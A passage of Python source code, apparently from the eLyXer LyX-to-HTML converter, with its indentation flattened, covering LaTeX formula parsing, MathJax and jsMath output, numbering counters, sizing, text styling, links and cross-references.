Constant.__init__(self, string)
self.original = string
self.size = 1
self.type = None
def computesize(self):
"Compute the size of the constant: always 1."
return self.size
def clone(self):
"Return a copy of itself."
return FormulaConstant(self.original)
def __unicode__(self):
"Return a printable representation."
return 'Formula constant: ' + self.string
if sys.version_info >= (3, 0):
__str__ = __unicode__
class RawText(FormulaBit):
"A bit of text inside a formula"
def detect(self, pos):
"Detect a bit of raw text"
return pos.current().isalpha()
def parsebit(self, pos):
"Parse alphabetic text"
alpha = pos.globalpha()
self.add(FormulaConstant(alpha))
self.type = 'alpha'
class FormulaSymbol(FormulaBit):
"A symbol inside a formula"
modified = FormulaConfig.modified
unmodified = FormulaConfig.unmodified['characters']
def detect(self, pos):
"Detect a symbol"
if pos.current() in FormulaSymbol.unmodified:
return True
if pos.current() in FormulaSymbol.modified:
return True
return False
def parsebit(self, pos):
"Parse the symbol"
if pos.current() in FormulaSymbol.unmodified:
self.addsymbol(pos.current(), pos)
return
if pos.current() in FormulaSymbol.modified:
self.addsymbol(FormulaSymbol.modified[pos.current()], pos)
return
Trace.error('Symbol ' + pos.current() + ' not found')
def addsymbol(self, symbol, pos):
"Add a symbol"
self.skiporiginal(pos.current(), pos)
self.contents.append(FormulaConstant(symbol))
class FormulaNumber(FormulaBit):
"A string of digits in a formula"
def detect(self, pos):
"Detect a digit"
return pos.current().isdigit()
def parsebit(self, pos):
"Parse a bunch of digits"
digits = pos.glob(lambda: pos.current().isdigit())
self.add(FormulaConstant(digits))
self.type = 'number'
class Comment(FormulaBit):
"A LaTeX comment: % to the end of the line."
start = FormulaConfig.starts['comment']
def detect(self, pos):
"Detect the %."
return pos.current() == self.start
def parsebit(self, pos):
"Parse to the end of the line."
self.original += pos.globincluding('\n')
class WhiteSpace(FormulaBit):
"Some white space inside a formula."
def detect(self, pos):
"Detect the white space."
return pos.current().isspace()
def parsebit(self, pos):
"Parse all whitespace."
self.original += pos.skipspace()
def __unicode__(self):
"Return a printable representation."
return 'Whitespace: *' + self.original + '*'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Bracket(FormulaBit):
"A {} bracket inside a formula"
start = FormulaConfig.starts['bracket']
ending = FormulaConfig.endings['bracket']
def __init__(self):
"Create a (possibly literal) new bracket"
FormulaBit.__init__(self)
self.inner = None
def detect(self, pos):
"Detect the start of a bracket"
return pos.checkfor(self.start)
def parsebit(self, pos):
"Parse the bracket"
self.parsecomplete(pos, self.innerformula)
return self
def parsetext(self, pos):
"Parse a text bracket"
self.parsecomplete(pos, self.innertext)
return self
def parseliteral(self, pos):
"Parse a literal bracket"
self.parsecomplete(pos, self.innerliteral)
return self
def parsecomplete(self, pos, innerparser):
"Parse the start and end marks"
if not pos.checkfor(self.start):
Trace.error('Bracket should start with ' + self.start + ' at ' + pos.identifier())
return None
self.skiporiginal(self.start, pos)
pos.pushending(self.ending)
innerparser(pos)
self.original += pos.popending(self.ending)
self.computesize()
def innerformula(self, pos):
"Parse a whole formula inside the bracket"
while not pos.finished():
self.add(self.factory.parseany(pos))
def innertext(self, pos):
"Parse some text inside the bracket, following textual rules."
specialchars = list(FormulaConfig.symbolfunctions.keys())
specialchars.append(FormulaConfig.starts['command'])
specialchars.append(FormulaConfig.starts['bracket'])
specialchars.append(Comment.start)
while not pos.finished():
if pos.current() in specialchars:
self.add(self.factory.parseany(pos))
if pos.checkskip(' '):
self.original += ' '
else:
self.add(FormulaConstant(pos.skipcurrent()))
def innerliteral(self, pos):
"Parse a literal inside the bracket, which does not generate HTML."
self.literal = ''
while not pos.finished() and not pos.current() == self.ending:
if pos.current() == self.start:
self.parseliteral(pos)
else:
self.literal += pos.skipcurrent()
self.original += self.literal
class SquareBracket(Bracket):
"A [] bracket inside a formula"
start = FormulaConfig.starts['squarebracket']
ending = FormulaConfig.endings['squarebracket']
def clone(self):
"Return a new square bracket with the same contents."
bracket = SquareBracket()
bracket.contents = self.contents
return bracket
class MathsProcessor(object):
"A processor for a maths construction inside the FormulaProcessor."
def process(self, contents, index):
"Process an element inside a formula."
Trace.error('Unimplemented process() in ' + unicode(self))
def __unicode__(self):
"Return a printable description."
return 'Maths processor ' + self.__class__.__name__
if sys.version_info >= (3, 0):
__str__ = __unicode__
class FormulaProcessor(object):
"A processor specifically for formulas."
processors = []
def process(self, bit):
"Process the contents of every formula bit, recursively."
self.processcontents(bit)
self.processinsides(bit)
self.traversewhole(bit)
def processcontents(self, bit):
"Process the contents of a formula bit."
if not isinstance(bit, FormulaBit):
return
bit.process()
for element in bit.contents:
self.processcontents(element)
def processinsides(self, bit):
"Process the insides (limits, brackets) in a formula bit."
if not isinstance(bit, FormulaBit):
return
for index, element in enumerate(bit.contents):
for processor in self.processors:
processor.process(bit.contents, index)
# continue with recursive processing
self.processinsides(element)
def traversewhole(self, formula):
"Traverse over the contents to alter variables and space units."
last = None
for bit, contents in self.traverse(formula):
if bit.type == 'alpha':
self.italicize(bit, contents)
elif bit.type == 'font' and last and last.type == 'number':
bit.contents.insert(0, FormulaConstant(u' '))
last = bit
def traverse(self, bit):
"Traverse a formula and yield a flattened structure of (bit, list) pairs."
for element in bit.contents:
if hasattr(element, 'type') and element.type:
yield (element, bit.contents)
elif isinstance(element, FormulaBit):
for pair in self.traverse(element):
yield pair
def italicize(self, bit, contents):
"Italicize the given bit of text."
index = contents.index(bit)
contents[index] = TaggedBit().complete([bit], 'i')
class Formula(Container):
"A LaTeX formula"
def __init__(self):
self.parser = FormulaParser()
self.output = TaggedOutput().settag('span class="formula"')
def process(self):
"Convert the formula to tags"
if self.header[0] == 'inline':
DocumentParameters.displaymode = False
else:
DocumentParameters.displaymode = True
self.output.settag('div class="formula"', True)
if Options.jsmath:
self.jsmath()
elif Options.mathjax:
self.mathjax()
elif Options.googlecharts:
self.googlecharts()
else:
self.classic()
def jsmath(self):
"Make the contents for jsMath."
if self.header[0] != 'inline':
self.output = TaggedOutput().settag('div class="math"')
else:
self.output = TaggedOutput().settag('span class="math"')
self.contents = [Constant(self.parsed)]
def mathjax(self):
"Make the contents for MathJax."
self.output.tag = 'span class="MathJax_Preview"'
tag = 'script type="math/tex'
if self.header[0] != 'inline':
tag += ';mode=display'
self.contents = [TaggedText().constant(self.parsed, tag + '"', True)]
def googlecharts(self):
"Make the contents using Google Charts http://code.google.com/apis/chart/."
url = FormulaConfig.urls['googlecharts'] + quote_plus(self.parsed)
img = '<img class="chart" src="' + url + '" alt="' + self.parsed + '"/>'
self.contents = [Constant(img)]
def classic(self):
"Make the contents using classic output generation with XHTML and CSS."
whole = FormulaFactory().parseformula(self.parsed)
FormulaProcessor().process(whole)
whole.parent = self
self.contents = [whole]
def parse(self, pos):
"Parse using a parse position instead of self.parser."
if pos.checkskip('$$'):
self.parsedollarblock(pos)
elif pos.checkskip('$'):
self.parsedollarinline(pos)
elif pos.checkskip('\\('):
self.parseinlineto(pos, '\\)')
elif pos.checkskip('\\['):
self.parseblockto(pos, '\\]')
else:
pos.error('Unparseable formula')
self.process()
return self
def parsedollarinline(self, pos):
"Parse a $...$ formula."
self.header = ['inline']
self.parsedollar(pos)
def parsedollarblock(self, pos):
"Parse a $$...$$ formula."
self.header = ['block']
self.parsedollar(pos)
if not pos.checkskip('$'):
pos.error('Formula should be $$...$$, but last $ is missing.')
def parsedollar(self, pos):
"Parse to the next $."
pos.pushending('$')
self.parsed = pos.globexcluding('$')
pos.popending('$')
def parseinlineto(self, pos, limit):
"Parse a \\(...\\) formula."
self.header = ['inline']
self.parseupto(pos, limit)
def parseblockto(self, pos, limit):
"Parse a \\[...\\] formula."
self.header = ['block']
self.parseupto(pos, limit)
def parseupto(self, pos, limit):
"Parse a formula that ends with the given command."
pos.pushending(limit)
self.parsed = pos.glob(lambda: True)
pos.popending(limit)
def __unicode__(self):
"Return a printable representation."
if self.partkey and self.partkey.number:
return 'Formula (' + self.partkey.number + ')'
return 'Unnumbered formula'
if sys.version_info >= (3, 0):
__str__ = __unicode__
class WholeFormula(FormulaBit):
"Parse a whole formula"
def detect(self, pos):
"Not outside the formula is enough."
return not pos.finished()
def parsebit(self, pos):
"Parse with any formula bit"
while not pos.finished():
self.add(self.factory.parseany(pos))
class FormulaFactory(object):
"Construct bits of formula"
# bit types will be appended later
types = [FormulaSymbol, RawText, FormulaNumber, Bracket, Comment, WhiteSpace]
skippedtypes = [Comment, WhiteSpace]
defining = False
def __init__(self):
"Initialize the map of instances."
self.instances = dict()
def detecttype(self, type, pos):
"Detect a bit of a given type."
if pos.finished():
return False
return self.instance(type).detect(pos)
def instance(self, type):
"Get an instance of the given type."
if not type in self.instances or not self.instances[type]:
self.instances[type] = self.create(type)
return self.instances[type]
def create(self, type):
"Create a new formula bit of the given type."
return Cloner.create(type).setfactory(self)
def clearskipped(self, pos):
"Clear any skipped types."
while not pos.finished():
if not self.skipany(pos):
return
return
def skipany(self, pos):
"Skip any skipped types."
for type in self.skippedtypes:
if self.instance(type).detect(pos):
return self.parsetype(type, pos)
return None
def parseany(self, pos):
"Parse any formula bit at the current location."
for type in self.types + self.skippedtypes:
if self.detecttype(type, pos):
return self.parsetype(type, pos)
Trace.error('Unrecognized formula at ' + pos.identifier())
return FormulaConstant(pos.skipcurrent())
def parsetype(self, type, pos):
"Parse the given type and return it."
bit = self.instance(type)
self.instances[type] = None
returnedbit = bit.parsebit(pos)
if returnedbit:
return returnedbit.setfactory(self)
return bit
def parseformula(self, formula):
"Parse a string of text that contains a whole formula."
pos = TextPosition(formula)
whole = self.create(WholeFormula)
if whole.detect(pos):
whole.parsebit(pos)
return whole
# no formula found
if not pos.finished():
Trace.error('Unknown formula at: ' + pos.identifier())
whole.add(TaggedBit().constant(formula, 'span class="unknown"'))
return whole
class Translator(object):
"Reads the configuration file and tries to find a translation."
"Otherwise falls back to the messages in the config file."
instance = None
def translate(cls, key):
"Get the translated message for a key."
return cls.instance.getmessage(key)
translate = classmethod(translate)
def __init__(self):
self.translation = None
self.first = True
def findtranslation(self):
"Find the translation for the document language."
self.langcodes = None
if not DocumentParameters.language:
Trace.error('No language in document')
return
if not DocumentParameters.language in TranslationConfig.languages:
Trace.error('Unknown language ' + DocumentParameters.language)
return
if TranslationConfig.languages[DocumentParameters.language] == 'en':
return
langcodes = [TranslationConfig.languages[DocumentParameters.language]]
try:
self.translation = gettext.translation('elyxer', None, langcodes)
except IOError:
Trace.error('No translation for ' + unicode(langcodes))
def getmessage(self, key):
"Get the translated message for the given key."
if self.first:
self.findtranslation()
self.first = False
message = self.getuntranslated(key)
if not self.translation:
return message
try:
message = self.translation.ugettext(message)
except IOError:
pass
return message
def getuntranslated(self, key):
"Get the untranslated message."
if not key in TranslationConfig.constants:
Trace.error('Cannot translate ' + key)
return key
return TranslationConfig.constants[key]
Translator.instance = Translator()
class NumberCounter(object):
"A counter for numbers (by default)."
"The type can be changed to return letters, roman numbers..."
name = None
value = None
mode = None
master = None
letters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
symbols = NumberingConfig.sequence['symbols']
romannumerals = [
('M', 1000), ('CM', 900), ('D', 500), ('CD', 400), ('C', 100),
('XC', 90), ('L', 50), ('XL', 40), ('X', 10), ('IX', 9), ('V', 5),
('IV', 4), ('I', 1)
]
def __init__(self, name):
"Give a name to the counter."
self.name = name
def setmode(self, mode):
"Set the counter mode. Can be changed at runtime."
self.mode = mode
return self
def init(self, value):
"Set an initial value."
self.value = value
def gettext(self):
"Get the next value as a text string."
return unicode(self.value)
def getletter(self):
"Get the next value as a letter."
return self.getsequence(self.letters)
def getsymbol(self):
"Get the next value as a symbol."
return self.getsequence(self.symbols)
def getsequence(self, sequence):
"Get the next value from elyxer.a sequence."
return sequence[(self.value - 1) % len(sequence)]
def getroman(self):
"Get the next value as a roman number."
result = ''
number = self.value
for numeral, value in self.romannumerals:
if number >= value:
result += numeral * (number / value)
number = number % value
return result
def getvalue(self):
"Get the current value as configured in the current mode."
if not self.mode or self.mode in ['text', '1']:
return self.gettext()
if self.mode == 'A':
return self.getletter()
if self.mode == 'a':
return self.getletter().lower()
if self.mode == 'I':
return self.getroman()
if self.mode == '*':
return self.getsymbol()
Trace.error('Unknown counter mode ' + self.mode)
return self.gettext()
def getnext(self):
"Increase the current value and get the next value as configured."
if not self.value:
self.value = 0
self.value += 1
return self.getvalue()
def reset(self):
"Reset the counter."
self.value = 0
def __unicode__(self):
"Return a printable representation."
result = 'Counter ' + self.name
if self.mode:
result += ' in mode ' + self.mode
return result
if sys.version_info >= (3, 0):
__str__ = __unicode__
class DependentCounter(NumberCounter):
"A counter which depends on another one (the master)."
def setmaster(self, master):
"Set the master counter."
self.master = master
self.last = self.master.getvalue()
return self
def getnext(self):
"Increase or, if the master counter has changed, restart."
if self.last != self.master.getvalue():
self.reset()
value = NumberCounter.getnext(self)
self.last = self.master.getvalue()
return value
def getvalue(self):
"Get the value of the combined counter: master.dependent."
return self.master.getvalue() + '.' + NumberCounter.getvalue(self)
class NumberGenerator(object):
"A number generator for unique sequences and hierarchical structures. Used in:"
" * ordered part numbers: Chapter 3, Section 5.3."
" * unique part numbers: Footnote 15, Bibliography cite [15]."
" * chaptered part numbers: Figure 3.15, Equation (8.3)."
" * unique roman part numbers: Part I, Book IV."
chaptered = None
generator = None
romanlayouts = [x.lower() for x in NumberingConfig.layouts['roman']]
orderedlayouts = [x.lower() for x in NumberingConfig.layouts['ordered']]
counters = dict()
appendix = None
def deasterisk(self, type):
"Remove the possible asterisk in a layout type."
return type.replace('*', '')
def isunique(self, type):
"Find out if the layout type corresponds to a unique part."
return self.isroman(type)
def isroman(self, type):
"Find out if the layout type should have roman numeration."
return self.deasterisk(type).lower() in self.romanlayouts
def isinordered(self, type):
"Find out if the layout type corresponds to an (un)ordered part."
return self.deasterisk(type).lower() in self.orderedlayouts
def isnumbered(self, type):
"Find out if the type for a layout corresponds to a numbered layout."
if '*' in type:
return False
if self.isroman(type):
return True
if not self.isinordered(type):
return False
if self.getlevel(type) > DocumentParameters.maxdepth:
return False
return True
def isunordered(self, type):
"Find out if the type contains an asterisk, basically."
return '*' in type
def getlevel(self, type):
"Get the level that corresponds to a layout type."
if self.isunique(type):
return 0
if not self.isinordered(type):
Trace.error('Unknown layout type ' + type)
return 0
type = self.deasterisk(type).lower()
level = self.orderedlayouts.index(type) + 1
return level - DocumentParameters.startinglevel
def getparttype(self, type):
"Obtain the type for the part: without the asterisk, "
"and switched to Appendix if necessary."
if NumberGenerator.appendix and self.getlevel(type) == 1:
return 'Appendix'
return self.deasterisk(type)
def generate(self, type):
"Generate a number for a layout type."
"Unique part types such as Part or Book generate roman numbers: Part I."
"Ordered part types return dot-separated tuples: Chapter 5, Subsection 2.3.5."
"Everything else generates unique numbers: Bibliography [1]."
"Each invocation results in a new number."
return self.getcounter(type).getnext()
def getcounter(self, type):
"Get the counter for the given type."
type = type.lower()
if not type in self.counters:
self.counters[type] = self.create(type)
return self.counters[type]
def create(self, type):
"Create a counter for the given type."
if self.isnumbered(type) and self.getlevel(type) > 1:
index = self.orderedlayouts.index(type)
above = self.orderedlayouts[index - 1]
master = self.getcounter(above)
return self.createdependent(type, master)
counter = NumberCounter(type)
if self.isroman(type):
counter.setmode('I')
return counter
def getdependentcounter(self, type, master):
"Get (or create) a counter of the given type that depends on another."
if not type in self.counters or not self.counters[type].master:
self.counters[type] = self.createdependent(type, master)
return self.counters[type]
def createdependent(self, type, master):
"Create a dependent counter given the master."
return DependentCounter(type).setmaster(master)
def startappendix(self):
"Start appendices here."
firsttype = self.orderedlayouts[DocumentParameters.startinglevel]
counter = self.getcounter(firsttype)
counter.setmode('A').reset()
NumberGenerator.appendix = True
class ChapteredGenerator(NumberGenerator):
"Generate chaptered numbers, as in Chapter.Number."
"Used in equations, figures: Equation (5.3), figure 8.15."
def generate(self, type):
"Generate a number which goes with first-level numbers (chapters). "
"For the article classes a unique number is generated."
if DocumentParameters.startinglevel > 0:
return NumberGenerator.generator.generate(type)
chapter = self.getcounter('Chapter')
return self.getdependentcounter(type, chapter).getnext()
NumberGenerator.chaptered = ChapteredGenerator()
NumberGenerator.generator = NumberGenerator()
class ContainerSize(object):
"The size of a container."
width = None
height = None
maxwidth = None
maxheight = None
scale = None
def set(self, width = None, height = None):
"Set the proper size with width and height."
self.setvalue('width', width)
self.setvalue('height', height)
return self
def setmax(self, maxwidth = None, maxheight = None):
"Set max width and/or height."
self.setvalue('maxwidth', maxwidth)
self.setvalue('maxheight', maxheight)
return self
def readparameters(self, container):
"Read some size parameters off a container."
self.setparameter(container, 'width')
self.setparameter(container, 'height')
self.setparameter(container, 'scale')
self.checkvalidheight(container)
return self
def setparameter(self, container, name):
"Read a size parameter off a container, and set it if present."
value = container.getparameter(name)
self.setvalue(name, value)
def setvalue(self, name, value):
"Set the value of a parameter name, only if it's valid."
value = self.processparameter(value)
if value:
setattr(self, name, value)
def checkvalidheight(self, container):
"Check if the height parameter is valid; otherwise erase it."
heightspecial = container.getparameter('height_special')
if self.height and self.extractnumber(self.height) == '1' and heightspecial == 'totalheight':
self.height = None
def processparameter(self, value):
"Do the full processing on a parameter."
if not value:
return None
if self.extractnumber(value) == '0':
return None
for ignored in StyleConfig.size['ignoredtexts']:
if ignored in value:
value = value.replace(ignored, '')
return value
def extractnumber(self, text):
"Extract the first number in the given text."
result = ''
decimal = False
for char in text:
if char.isdigit():
result += char
elif char == '.' and not decimal:
result += char
decimal = True
else:
return result
return result
def checkimage(self, width, height):
"Check image dimensions, set them if possible."
if width:
self.maxwidth = unicode(width) + 'px'
if self.scale and not self.width:
self.width = self.scalevalue(width)
if height:
self.maxheight = unicode(height) + 'px'
if self.scale and not self.height:
self.height = self.scalevalue(height)
if self.width and not self.height:
self.height = 'auto'
if self.height and not self.width:
self.width = 'auto'
def scalevalue(self, value):
"Scale the value according to the image scale and return it as unicode."
scaled = value * int(self.scale) / 100
return unicode(int(scaled)) + 'px'
def removepercentwidth(self):
"Remove percent width if present, to set it at the figure level."
if not self.width:
return None
if not '%' in self.width:
return None
width = self.width
self.width = None
if self.height == 'auto':
self.height = None
return width
def addstyle(self, container):
"Add the proper style attribute to the output tag."
if not isinstance(container.output, TaggedOutput):
Trace.error('No tag to add style, in ' + unicode(container))
if not self.width and not self.height and not self.maxwidth and not self.maxheight:
# nothing to see here; move along
return
tag = ' style="'
tag += self.styleparameter('width')
tag += self.styleparameter('maxwidth')
tag += self.styleparameter('height')
tag += self.styleparameter('maxheight')
if tag[-1] == ' ':
tag = tag[:-1]
tag += '"'
container.output.tag += tag
def styleparameter(self, name):
"Get the style for a single parameter."
value = getattr(self, name)
if value:
return name.replace('max', 'max-') + ': ' + value + '; '
return ''
class QuoteContainer(Container):
"A container for a pretty quote"
def __init__(self):
self.parser = BoundedParser()
self.output = FixedOutput()
def process(self):
"Process contents"
self.type = self.header[2]
if not self.type in StyleConfig.quotes:
Trace.error('Quote type ' + self.type + ' not found')
self.html = ['"']
return
self.html = [StyleConfig.quotes[self.type]]
class LyXLine(Container):
"A Lyx line"
def __init__(self):
self.parser = LoneCommand()
self.output = FixedOutput()
def process(self):
self.html = ['<hr class="line" />']
class EmphaticText(TaggedText):
"Text with emphatic mode"
def process(self):
self.output.tag = 'i'
class ShapedText(TaggedText):
"Text shaped (italic, slanted)"
def process(self):
self.type = self.header[1]
if not self.type in TagConfig.shaped:
Trace.error('Unrecognized shape ' + self.header[1])
self.output.tag = 'span'
return
self.output.tag = TagConfig.shaped[self.type]
class VersalitasText(TaggedText):
"Text in versalitas"
def process(self):
self.output.tag = 'span class="versalitas"'
class ColorText(TaggedText):
"Colored text"
def process(self):
self.color = self.header[1]
self.output.tag = 'span class="' + self.color + '"'
class SizeText(TaggedText):
"Sized text"
def process(self):
self.size = self.header[1]
self.output.tag = 'span class="' + self.size + '"'
class BoldText(TaggedText):
"Bold text"
def process(self):
self.output.tag = 'b'
class TextFamily(TaggedText):
"A bit of text from elyxer.a different family"
def process(self):
"Parse the type of family"
self.type = self.header[1]
if not self.type in TagConfig.family:
Trace.error('Unrecognized family ' + type)
self.output.tag = 'span'
return
self.output.tag = TagConfig.family[self.type]
class Hfill(TaggedText):
"Horizontall fill"
def process(self):
self.output.tag = 'span class="hfill"'
class BarredText(TaggedText):
"Text with a bar somewhere"
def process(self):
"Parse the type of bar"
self.type = self.header[1]
if not self.type in TagConfig.barred:
Trace.error('Unknown bar type ' + self.type)
self.output.tag = 'span'
return
self.output.tag = TagConfig.barred[self.type]
class LangLine(TaggedText):
"A line with language information"
def process(self):
"Only generate a span with lang info when the language is recognized."
lang = self.header[1]
if not lang in TranslationConfig.languages:
self.output = ContentsOutput()
return
isolang = TranslationConfig.languages[lang]
self.output = TaggedOutput().settag('span lang="' + isolang + '"', False)
class InsetLength(BlackBox):
"A length measure inside an inset."
def process(self):
self.length = self.header[1]
class Space(Container):
"A space of several types"
def __init__(self):
self.parser = InsetParser()
self.output = FixedOutput()
def process(self):
self.type = self.header[2]
if self.type not in StyleConfig.hspaces:
Trace.error('Unknown space type ' + self.type)
self.html = [' ']
return
self.html = [StyleConfig.hspaces[self.type]]
length = self.getlength()
if not length:
return
self.output = TaggedOutput().settag('span class="hspace"', False)
ContainerSize().set(length).addstyle(self)
def getlength(self):
"Get the space length from elyxer.the contents or parameters."
if len(self.contents) == 0 or not isinstance(self.contents[0], InsetLength):
return None
return self.contents[0].length
class VerticalSpace(Container):
"An inset that contains a vertical space."
def __init__(self):
self.parser = InsetParser()
self.output = FixedOutput()
def process(self):
"Set the correct tag"
self.type = self.header[2]
if self.type not in StyleConfig.vspaces:
self.output = TaggedOutput().settag('div class="vspace" style="height: ' + self.type + ';"', True)
return
self.html = [StyleConfig.vspaces[self.type]]
class Align(Container):
"Bit of aligned text"
def __init__(self):
self.parser = ExcludingParser()
self.output = TaggedOutput().setbreaklines(True)
def process(self):
self.output.tag = 'div class="' + self.header[1] + '"'
class Newline(Container):
"A newline"
def __init__(self):
self.parser = LoneCommand()
self.output = FixedOutput()
def process(self):
"Process contents"
self.html = ['<br/>\n']
class NewPage(Newline):
"A new page"
def process(self):
"Process contents"
self.html = ['<p><br/>\n</p>\n']
class Separator(Container):
"A separator string which is not extracted by extracttext()."
def __init__(self, constant):
self.output = FixedOutput()
self.contents = []
self.html = [constant]
class StrikeOut(TaggedText):
"Striken out text."
def process(self):
"Set the output tag to strike."
self.output.tag = 'strike'
class StartAppendix(BlackBox):
"Mark to start an appendix here."
"From this point on, all chapters become appendices."
def process(self):
"Activate the special numbering scheme for appendices, using letters."
NumberGenerator.generator.startappendix()
class Link(Container):
"A link to another part of the document"
anchor = None
url = None
type = None
page = None
target = None
destination = None
title = None
def __init__(self):
"Initialize the link, add target if configured."
self.contents = []
self.parser = InsetParser()
self.output = LinkOutput()
if Options.target:
self.target = Options.target
def complete(self, text, anchor = None, url = None, type = None, title = None):
"Complete the link."
self.contents = [Constant(text)]
if anchor:
self.anchor = anchor
if url:
self.url = url
if type:
self.type = type
if title:
self.title = title
return self
def computedestination(self):
"Use the destination link to fill in the destination URL."
if not self.destination:
return
self.url = ''
if self.destination.anchor:
self.url = '#' + self.destination.anchor
if self.destination.page:
self.url = self.destination.page + self.url
def setmutualdestination(self, destination):
"Set another link as destination, and set its destination to this one."
self.destination = destination
destination.destination = self
def __unicode__(self):
"Return a printable representation."
result = 'Link'
if self.anchor:
result += ' #' + self.anchor
if self.url:
result += ' to ' + self.url
return result
if sys.version_info >= (3, 0):
__str__ = __unicode__
class URL(Link):
"A clickable URL"
def process(self):
"Read URL from elyxer.parameters"
target = self.escape(self.getparameter('target'))
self.url = target
type = self.getparameter('type')
if type:
self.url = self.escape(type) + target
name = self.getparameter('name')
if not name:
name = target
self.contents = [Constant(name)]
class FlexURL(URL):
"A flexible URL"
def process(self):
"Read URL from elyxer.contents"
self.url = self.extracttext()
class LinkOutput(ContainerOutput):
"A link pointing to some destination"
"Or an anchor (destination)"
def gethtml(self, link):
"Get the HTML code for the link"
type = link.__class__.__name__
if link.type:
type = link.type
tag = 'a class="' + type + '"'
if link.anchor:
tag += ' name="' + link.anchor + '"'
if link.destination:
link.computedestination()
if link.url:
tag += ' href="' + link.url + '"'
if link.target:
tag += ' target="' + link.target + '"'
if link.title:
tag += ' title="' + link.title + '"'
return TaggedOutput().settag(tag).gethtml(link)
class Postprocessor(object):
"Postprocess a container keeping some context"
stages = []
def __init__(self):
self.stages = StageDict(Postprocessor.stages, self)
self.current = None
self.last = None
def postprocess(self, next):
"Postprocess a container and its contents."
self.postrecursive(self.current)
result = self.postcurrent(next)
self.last = self.current
self.current = next
return result
def postrecursive(self, container):
"Postprocess the container contents recursively"
if not hasattr(container, 'contents'):
return
if len(container.contents) == 0:
return
if hasattr(container, 'postprocess'):
if not container.postprocess:
return
postprocessor = Postprocessor()
contents = []
for element in container.contents:
post = postprocessor.postprocess(element)
if post:
contents.append(post)
# two rounds to empty the pipeline
for i in range(2):
post = postprocessor.postprocess(None)
if post:
contents.append(post)
container.contents = contents
def postcurrent(self, next):
"Postprocess the current element taking into account next and last."
stage = self.stages.getstage(self.current)
if not stage:
return self.current
return stage.postprocess(self.last, self.current, next)
class StageDict(object):
"A dictionary of stages corresponding to classes"
def __init__(self, classes, postprocessor):
"Instantiate an element from elyxer.each class and store as a dictionary"
instances = self.instantiate(classes, postprocessor)
self.stagedict = dict([(x.processedclass, x) for x in instances])
def instantiate(self, classes, postprocessor):
"Instantiate an element from elyxer.each class"
stages = [x.__new__(x) for x in classes]
for element in stages:
element.__init__()
element.postprocessor = postprocessor
return stages
def getstage(self, element):
"Get the stage for a given element, if the type is in the dict"
if not element.__class__ in self.stagedict:
return None
return self.stagedict[element.__class__]
class Label(Link):
"A label to be referenced"
names = dict()
lastlayout = None
def __init__(self):
Link.__init__(self)
self.lastnumbered = None
def process(self):
"Process a label container."
key = self.getparameter('name')
self.create(' ', key)
self.lastnumbered = Label.lastlayout
def create(self, text, key, type = 'Label'):
"Create the label for a given key."
self.key = key
self.complete(text, anchor = key, type = type)
Label.names[key] = self
if key in Reference.references:
for reference in Reference.references[key]:
reference.destination = self
return self
def findpartkey(self):
"Get the part key for the latest numbered container seen."
numbered = self.numbered(self)
if numbered and numbered.partkey:
return numbered.partkey
return ''
def numbered(self, container):
"Get the numbered container for the label."
if container.partkey:
return container
if not container.parent:
if self.lastnumbered:
return self.lastnumbered
return None
return self.numbered(container.parent)
def __unicode__(self):
"Return a printable representation."
if not hasattr(self, 'key'):
return 'Unnamed label'
return 'Label ' + self.key
if sys.version_info >= (3, 0):
__str__ = __unicode__
class Reference(Link):
"A reference to a label."
references = dict()
key = 'none'
def process(self):
"Read the reference and set the arrow."
self.key = self.getparameter('reference')
if self.key in Label.names:
self.direction = u'↑'
label = Label.names[self.key]
else:
self.direction = u'↓'
label = Label().complete(' ', self.key, 'preref')
self.destination = label
self.formatcontents()
if not self.key in Reference.references:
Reference.references[self.key] = []
Reference.references[self.key].append(self)
def formatcontents(self):
"Format the reference contents."
formatkey = self.getparameter('LatexCommand')
if not formatkey:
formatkey = 'ref'
self.formatted = u'↕'
if formatkey in StyleConfig.referenceformats:
self.formatted = StyleConfig.referenceformats[formatkey]
else:
Trace.error('Unknown reference format ' + formatkey)
self.replace(u'↕', self.direction)
self.replace('#', '1')
self.replace('on-page', Translator.translate('on-page'))
partkey = self.destination.findpartkey()
# only if partkey and partkey.number are not null, send partkey.number
self.replace('@', partkey and partkey.number)
self.replace(u'¶', partkey and partkey.tocentry)
if not '$' in self.formatted or not partkey or not partkey.titlecontents:
# there is a $ left, but it should go away on preprocessing
self.contents = [Constant(self.formatted)]
return
pieces = self.formatted.split('$')
self.contents = [Constant(pieces[0])]
for piece in pieces[1:]:
self.contents += partkey.titlecontents
self.contents.append(Constant(piece))
def replace(self, key, value):
"Replace a key in the format template with a value."
if not key in self.formatted:
return
if not value:
value = ''
self.formatted = self.formatted.replace(key, value)
def __unicode__(self):
"Return a printable representation."
return 'Reference ' + self.key
if sys.version_info >= (3, 0):
__str__ = __unicode__
class FormulaCommand(FormulaBit):
"A LaTeX command inside a formula"
types = []
start = FormulaConfig.starts['command']
commandmap = None
def detect(self, pos):
"Find the current command."
return pos.checkfor(FormulaCommand.start)
def parsebit(self, pos):
"Parse the command."
command = self.extractcommand(pos)
bit = self.parsewithcommand(command, pos)
if bit:
return bit
if command.startswith('\\up') or command.startswith('\\Up'):
upgreek = self.parseupgreek(command, pos)
if upgreek:
return upgreek
if not self.factory.defining:
Trace.error('Unknown command ' + command)
self.output = TaggedOutput().settag('span class="unknown"')
self.add(FormulaConstant(command))
return None
def parsewithcommand(self, command, pos):
"Parse the command type once we have the command."
for type in FormulaCommand.types:
if command in type.commandmap:
return self.parsecommandtype(command, type, pos)
return None
def parsecommandtype(self, command, type, pos):
"Parse a given command type."
bit = self.factory.create(type)
bit.setcommand(command)
returned = bit.parsebit(pos)
if returned:
return returned
return bit
def extractcommand(self, pos):
"Extract the command from elyxer.the current position."
if not pos.checkskip(FormulaCommand.start):
pos.error('Missing command start ' + FormulaCommand.start)
return
if pos.finished():
return self.emptycommand(pos)
if pos.current().isalpha():
# alpha command
command = FormulaCommand.start + pos.globalpha()
# skip mark of short command
pos.checkskip('*')
return command
# symbol command
return FormulaCommand.start + pos.skipcurrent()
def emptycommand(self, pos):
"""Check for an empty command: look for command disguised as ending.
Special case against '{ \\{ \\} }' situation."""
command = ''
if not pos.isout():
ending = pos.nextending()
if ending and pos.checkskip(ending):
command = ending
return FormulaCommand.start + command
def parseupgreek(self, command, pos):
"Parse the Greek \\up command.."
if len(command) < 4:
return None
if command.startswith('\\up'):
upcommand = '\\' + command[3:]
elif pos.checkskip('\\Up'):
upcommand = '\\' + command[3:4].upper() + command[4:]
else:
Trace.error('Impossible upgreek command: ' + command)
return
